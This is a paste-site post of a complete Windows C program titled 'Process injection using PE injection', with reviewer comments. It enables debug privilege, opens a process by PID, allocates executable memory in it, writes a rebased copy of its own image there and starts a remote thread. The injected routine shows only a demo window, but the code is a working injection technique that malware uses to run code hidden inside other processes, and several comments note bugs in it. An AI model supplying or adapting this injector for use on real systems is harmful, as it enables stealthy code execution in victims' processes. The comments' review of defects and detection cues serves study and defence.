amiralbenz

Process injection using PE injection

Sep 12th, 2015
  1. #include <stdio.h>
  2. #include <Windows.h>
  3. #include <winternl.h>
  4.  
  5. #pragma comment(lib,"ntdll.lib")
  6.  
/*
 * Process/thread identifier pair in the layout ntdll expects for the
 * ClientId argument of NtOpenProcess and RtlCreateUserThread below.
 * Declared locally because the headers included above do not provide
 * it in this build (TODO confirm against the SDK version in use).
 */
typedef struct _CLIENT_ID
{
    PVOID UniqueProcess;   /* process id; main stores the command-line PID here, cast to HANDLE */
    PVOID UniqueThread;    /* thread id; main leaves it 0 */
}CLIENT_ID,*PCLIENT_ID;
  12.  
/*
 * ntdll exports that winternl.h does not declare in this build; they are
 * bound at link time through the ntdll.lib pragma above. The remaining Nt*
 * calls in main (NtClose, NtWaitForSingleObject) presumably come from
 * winternl.h itself. Parameter meanings below are described as main uses them.
 */

/* Creates a thread in another process. main passes: the process handle, a NULL
   security descriptor, FALSE (not created suspended), 0 for the ULONG and the
   two PULONG stack parameters, the remote start address, one PVOID parameter,
   the address that receives the thread handle, and NULL for the client id. */
EXTERN_C NTSTATUS NTAPI RtlCreateUserThread(
HANDLE,
PSECURITY_DESCRIPTOR,
BOOLEAN,
ULONG,
PULONG,
PULONG,
PVOID,
PVOID,
PHANDLE,
PCLIENT_ID);

/* Returns the IMAGE_NT_HEADERS of a mapped image given its base address. */
EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID);

/* Enables (TRUE) or disables a privilege given by its numeric value; the second
   BOOLEAN selects the current thread instead of the process, and the PBOOLEAN
   receives the previous state. Its return status is not checked in main. */
EXTERN_C NTSTATUS NTAPI RtlAdjustPrivilege(ULONG,BOOLEAN,BOOLEAN,PBOOLEAN);
/* Opens the process identified by the CLIENT_ID with the requested access mask. */
EXTERN_C NTSTATUS NTAPI NtOpenProcess(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,PCLIENT_ID);
/* Writes a local buffer into another process: (process, remote address,
   local buffer, byte count, optional out count — NULL in main). */
EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
  30.  
/*
 * Handles WM_KEYDOWN for the demo window: Enter and Space raise a message
 * box, 'B' beeps, every other key is ignored.
 */
static void report_key(HWND hWnd, WPARAM key)
{
    if (key == VK_RETURN) {
        MessageBox(hWnd, "You pressed the enter key.", "Message", MB_ICONINFORMATION);
    } else if (key == VK_SPACE) {
        MessageBox(hWnd, "You pressed the spacebar key.", "Message", MB_ICONINFORMATION);
    } else if (key == 'B') {
        Beep(800, 200);
    }
}

/*
 * Window procedure for the "PEWndClass" window that ThreadProc registers and
 * creates. Paint, mouse-button and key-down messages are answered locally
 * (returning 0); everything else goes to DefWindowProc. WM_DESTROY posts the
 * quit message that ends ThreadProc's message loop.
 */
LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    PAINTSTRUCT paint;

    switch (uMsg) {
    case WM_DESTROY:
        PostQuitMessage(0);
        return 0;

    case WM_PAINT: {
        HDC dc = BeginPaint(hWnd, &paint);
        /* Brush argument is 0 (no brush), so this presumably paints nothing — TODO confirm. */
        FillRect(dc, &paint.rcPaint, 0);
        EndPaint(hWnd, &paint);
        return 0;
    }

    case WM_LBUTTONDOWN:
        MessageBox(hWnd, "You clicked the left mouse button.", "Message", MB_ICONINFORMATION);
        return 0;

    case WM_RBUTTONDOWN:
        MessageBox(hWnd, "You clicked the right mouse button.", "Message", MB_ICONINFORMATION);
        return 0;

    case WM_KEYDOWN:
        report_key(hWnd, wParam);
        return 0;

    default:
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }
}
  80.  
/*
 * Routine that main starts in the target process via RtlCreateUserThread.
 * main computes its remote address as ThreadProc's offset from this image's
 * base applied to the remote buffer, and passes that buffer as the single
 * argument, so hInst is the base of the copied image. Registers the
 * "PEWndClass" window class, shows a window, pumps messages until
 * WM_QUIT, then unregisters the class and ends the thread with ExitThread(0)
 * (which never returns, so the void return type is never observed).
 *
 * NOTE(review): nothing in this file re-resolves imports for the target; the
 * calls below go through the copied image's import table as it was filled in
 * this process — presumably workable only while the same DLLs sit at the same
 * addresses in both processes. Confirm before relying on it.
 */
void WINAPI ThreadProc(HINSTANCE hInst)
{
    WNDCLASS wndClass = {0};
    MSG msg;

    wndClass.hInstance = hInst;
    wndClass.lpfnWndProc = WndProc;
    wndClass.lpszClassName = "PEWndClass";
    RegisterClass(&wndClass);   /* return value not checked, as in the original */

    HWND window = CreateWindowEx(0,
                                 "PEWndClass",
                                 "PE injection window",
                                 WS_OVERLAPPEDWINDOW,
                                 50, 50, 250, 250,
                                 NULL, NULL, hInst, NULL);
    ShowWindow(window, SW_SHOW);   /* window may be NULL if creation failed; not checked */

    /* Runs until PostQuitMessage from WndProc's WM_DESTROY handler. */
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    UnregisterClass("PEWndClass", hInst);
    ExitThread(0);
}
  121.  
/*
 * Entry point of the injecting side. Takes one argument, a PID. Copies this
 * process's own mapped image, rebases the copy to a buffer allocated in the
 * target process, writes it there, starts ThreadProc inside it, waits for that
 * thread to finish and releases the handles and memory. Returns 0 on success,
 * 1 on a usage error or any failed NtOpenProcess / VirtualAllocEx /
 * NtWriteVirtualMemory / RtlCreateUserThread call.
 *
 * Review notes (defects left as found, see line comments):
 *  - the PID is parsed with atoi, which cannot report errors;
 *  - VirtualAlloc's result (image) is never checked before memcpy;
 *  - several printf conversions do not match their arguments
 *    (%#x for a pointer, %d for a DWORD);
 *  - the relocation walk never consults the directory's Size field and
 *    does not look at relocation types.
 */
int main(int argc,char* argv[])
{
    PIMAGE_NT_HEADERS pINH;          /* NT headers of this process's own image */
    PIMAGE_DATA_DIRECTORY pIDD;      /* base-relocation data directory entry */
    PIMAGE_BASE_RELOCATION pIBR;     /* cursor over the relocation blocks in the copy */

    HMODULE hModule;                 /* load address of this executable */
    PVOID image,mem,StartAddress;    /* local copy, remote buffer, remote address of ThreadProc */
    HANDLE hProcess,hThread;
    DWORD i,count,nSizeOfImage;
    DWORD_PTR delta,OldDelta;        /* remote base - preferred base, local base - preferred base */
    LPWORD list;                     /* 16-bit relocation entries following a block header */
    PDWORD_PTR p;                    /* pointer-sized slot being patched */
    BOOLEAN bl;                      /* previous privilege state; never read */
    NTSTATUS status;

    OBJECT_ATTRIBUTES oa;
    CLIENT_ID cid;

    if(argc!=2)
    {
        printf("Usage: PEWindow.exe [PID]");
        return 1;
    }

    /* 20 = SE_DEBUG_PRIVILEGE, enabled process-wide. The status is ignored, so
       if this fails the only symptom is an access error from NtOpenProcess. */
    RtlAdjustPrivilege(20,TRUE,FALSE,&bl);

    hModule=GetModuleHandle(NULL);
    pINH=RtlImageNtHeader(hModule);

    /* Size of the whole mapped image; used for both allocations and the copy. */
    nSizeOfImage=pINH->OptionalHeader.SizeOfImage;

    InitializeObjectAttributes(&oa,NULL,0,NULL,NULL);

    /* atoi gives 0 for non-numeric input with no error indication; a strtoul
       call with an endptr check would reject bad PIDs instead of trying PID 0. */
    cid.UniqueProcess=(HANDLE)atoi(argv[1]);
    cid.UniqueThread=0;

    printf("\nOpening target process handle.\n");

    /* PROCESS_ALL_ACCESS is more than the memory and thread rights used below. */
    if(!NT_SUCCESS(status=NtOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oa,&cid)))
    {
        printf("\nError: Unable to open target process handle. NtOpenProcess failed with status %#x\n",status);
        return 1;
    }

    printf("\nAllocating memory in target process.\n");

    /* One RWX region the size of the whole image in the remote process.
       A cross-process RWX allocation followed by NtWriteVirtualMemory and a
       remote thread start is the sequence that defensive tooling commonly flags. */
    mem=VirtualAllocEx(hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

    if(mem==NULL)
    {
        /* %d with a DWORD argument; %lu would match. */
        printf("\nError: Unable to allocate memory in target process. VirtualAllocEx failed with error %d\n",GetLastError());

        NtClose(hProcess);
        return 1;
    }

    /* %#x with a pointer argument is undefined and truncates on 64-bit; %p is the
       matching conversion. */
    printf("\nMemory allocated. Address: %#x\n",mem);

    /* Local scratch copy of the image. The result is not checked: if this fails,
       the memcpy below writes through a NULL pointer, and hProcess/mem leak. */
    image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

    /* Copies the entire mapped image as it is right now — headers, code, and
       global data in its current state — not the file on disk. */
    memcpy(image,hModule,nSizeOfImage);

    pIDD=&pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    /* pIDD->Size is never consulted. If the image has no relocation directory
       (VirtualAddress 0), pIBR points at the copy's DOS header and the loop below
       would read header bytes as relocation blocks. */
    pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress);

    /* Both deltas are measured from the preferred ImageBase; subtracting OldDelta
       and adding delta moves each patched slot from this process's load address
       to the remote buffer's address. */
    delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase);
    OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase);

    /* Walks relocation blocks until a zero VirtualAddress terminates the list.
       There is no upper bound from pIDD->Size, so the walk relies on that
       terminator, and a block with SizeOfBlock 0 would never advance pIBR. */
    while(pIBR->VirtualAddress!=0)
    {
        if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION))
        {
            /* Number of 16-bit entries in this block and where they start. */
            count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD);
            list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION));

            for(i=0;i<count;i++)
            {
                /* Only the low 12 bits (page offset) are used; the 4-bit relocation
                   type in the high bits is never examined, so every non-zero entry is
                   patched as a pointer-sized slot whatever its declared type. */
                if(list[i]>0)
                {
                    p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list[i]))));

                   *p-=OldDelta;
                   *p+=delta;
                }
            }
        }

        pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock);
    }

    printf("\nWriting executable image into target process.\n");

    /* Whole rebased copy goes into the remote RWX buffer in one write. */
    if(!NT_SUCCESS(status=NtWriteVirtualMemory(hProcess,mem,image,nSizeOfImage,NULL)))
    {
        printf("\nError: Unable to write executable image into target process. NtWriteVirtualMemory failed with status %#x\n",status);

        VirtualFreeEx(hProcess,mem,0,MEM_RELEASE);
        NtClose(hProcess);
        return 1;
    }

    /* Remote address of ThreadProc: its offset from this image's base applied to
       the remote base. Valid only because the copy was rebased above. */
    StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule);

    printf("\nCreating remote thread in target process.\n");

    /* Thread starts immediately (not suspended) and receives mem as its single
       argument, which ThreadProc treats as the HINSTANCE of the copied image.
       NOTE(review): nothing here re-resolves imports for the target; the copied
       import table is used as-is, which presumably relies on the same DLLs being
       mapped at the same addresses in both processes — confirm. */
    if(!NT_SUCCESS(status=RtlCreateUserThread(hProcess,NULL,FALSE,0,0,0,StartAddress,mem,&hThread,NULL)))
    {
        printf("\nError: Unable to create remote thread in target process. RtlCreateUserThread failed with status %#x\n",status);

        VirtualFreeEx(hProcess,mem,0,MEM_RELEASE);
        NtClose(hProcess);
        return 1;
    }

    printf("\nThread created. Waiting for the thread to terminate.\n");

    /* No timeout: blocks until ThreadProc calls ExitThread. */
    NtWaitForSingleObject(hThread,FALSE,NULL);

    printf("\nThread terminated.\n");

    NtClose(hThread);

    printf("\nFreeing allocated memory.\n");

    /* Remote buffer is released only after the thread is gone; image is the local copy. */
    VirtualFreeEx(hProcess,mem,0,MEM_RELEASE);
    NtClose(hProcess);

    VirtualFree(image,0,MEM_RELEASE);
    return 0;
}